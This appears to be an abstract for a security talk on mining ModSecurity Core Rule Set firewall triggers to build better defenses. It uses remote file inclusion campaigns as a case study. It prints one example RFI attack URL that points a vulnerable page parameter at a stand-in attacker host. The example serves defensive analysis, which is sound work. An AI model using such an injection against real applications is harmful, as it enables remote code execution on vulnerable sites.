ModSecurity Web Application Firewall was first released more than a decade ago, available as open source software that gives the ability to protect web applications. Over the years ModSecurity has matured significantly, and is the most widely deployed WAF, protecting millions of websites. A long side ModSecurity engine we can also find OWASP ModSecurity Core Rule Set (CRS), which is a library of generic application security signatures that provide a base level of protection for any web application.
In this presentation I will show an advanced technique for post processing of ModSecurity Core Rule Set WAF triggers in order to generate actionable defenses that are derived from WAF triggers. The objective of the post processing is to improve security controls. Based on the collected malicious HTTP traffic we can produce new insights on our attackers and the techniques they use and as a result we can harden defenses that will improve our mitigations.
The presentation will include detailed description of several techniques with case studies based on real traffic from Akamai's security big data platform (Cloud Security Intelligence).
Example for analysis on remote file inclusion attack:
When analyzing the payload of a remote file inclusion attack we will find a link to a remote source code file the attackers are trying to inject into the vulnerable application.
The injected remote source file is in many cases a static "anchor" in a continues attack campaign that uses various RFI vulnerabilities with the same remote file.
Generating signature that matches attacks based on the attack "anchor" can improve the detection capabilities for ModSecurity CRS and at the same time give better insight on the threat landscape.
More than that, this "anchor" can be used as enrichment for other security controls that monitor URL and domain reputation.
RFI attack:
http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicous.php
In the attack above we can see remote source file located on “www.attacker.com/malicous.php”, using this malicious file can be valuable when:
Looking for the same link on HTTP traffic (complementary to ModSecurity CRS rules)
Blocking traffic from within the organization to the attacker web application
Correlating similar attacks as same distributed attack campaign